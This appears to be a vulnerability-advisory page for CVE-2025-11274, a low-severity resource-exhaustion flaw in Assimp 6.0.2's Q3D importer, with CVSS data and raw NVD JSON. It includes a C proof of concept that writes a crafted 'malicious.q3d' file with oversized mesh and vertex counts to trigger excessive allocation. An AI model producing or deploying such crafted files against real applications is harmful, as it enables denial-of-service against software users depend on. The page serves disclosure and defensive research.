Security Vulnerability Report
CVE-2025-11274 CVSS 3.3 LOW

CVE-2025-11274

Published: 2025-10-05 01:15:35
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was determined in Open Asset Import Library Assimp 6.0.2. Affected is the function Q3DImporter::InternReadFile of the file assimp/code/AssetLib/Q3D/Q3DLoader.cpp. This manipulation causes allocation of resources. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:assimp:assimp:6.0.2:*:*:*:*:*:*:* - VULNERABLE
Open Asset Import Library (Assimp) 6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-11274 - Assimp Q3DLoader Resource Allocation Vulnerability PoC
 *
 * This PoC demonstrates how to trigger resource exhaustion in Assimp's
 * Q3DImporter::InternReadFile function by crafting a malicious Q3D file
 * with abnormally large allocation requests.
 *
 * Usage: Place the generated malicious.q3d file and load it using Assimp
 * or any application that uses the Assimp library.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// Q3D file format magic header
static const char Q3D_MAGIC[] = "quick3Ds";

/*
 * Generate a malicious Q3D file that triggers excessive resource allocation
 * in Q3DImporter::InternReadFile.
 */
int generate_malicious_q3d(const char *filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        fprintf(stderr, "[-] Failed to create output file: %s\n", filename);
        return -1;
    }

    // Write Q3D magic header
    fwrite(Q3D_MAGIC, 1, strlen(Q3D_MAGIC), fp);

    // Write version info
    uint32_t version = 0x00010000; // Version 1.0
    fwrite(&version, sizeof(uint32_t), 1, fp);

    // Craft an abnormally large mesh count to trigger excessive allocation
    uint32_t mesh_count = 0xFFFFFFFF; // Intentionally oversized value
    fwrite(&mesh_count, sizeof(uint32_t), 1, fp);

    // Write vertex data with extreme dimensions
    uint32_t vertex_count = 0x7FFFFFFF;
    fwrite(&vertex_count, sizeof(uint32_t), 1, fp);

    // Fill with padding data to make the file appear valid enough for parsing
    for (int i = 0; i < 1024; i++) {
        uint32_t padding = 0xDEADBEEF;
        fwrite(&padding, sizeof(uint32_t), 1, fp);
    }

    fclose(fp);
    printf("[+] Malicious Q3D file generated: %s\n", filename);
    printf("[+] Load this file with Assimp to trigger CVE-2025-11274\n");
    return 0;
}

int main(int argc, char *argv[]) {
    const char *output = "malicious.q3d";
    if (argc > 1) {
        output = argv[1];
    }
    printf("[*] CVE-2025-11274 PoC - Assimp Q3DLoader Resource Exhaustion\n");
    printf("[*] Generating malicious Q3D file...\n");
    return generate_malicious_q3d(output);
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11274", "sourceIdentifier": "[email protected]", "published": "2025-10-05T01:15:35.247", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Open Asset Import Library Assimp 6.0.2. Affected is the function Q3DImporter::InternReadFile of the file assimp/code/AssetLib/Q3D/Q3DLoader.cpp. This manipulation causes allocation of resources. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:assimp:assimp:6.0.2:*:*:*:*:*:*:*", "matchCriteriaId": 
"B5BC643B-B249-45CC-A377-45E37EB62AEA"}]}]}], "references": [{"url": "https://github.com/assimp/assimp/issues/6356", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/user-attachments/files/22407575/poc.zip", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.327008", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327008", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.658075", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}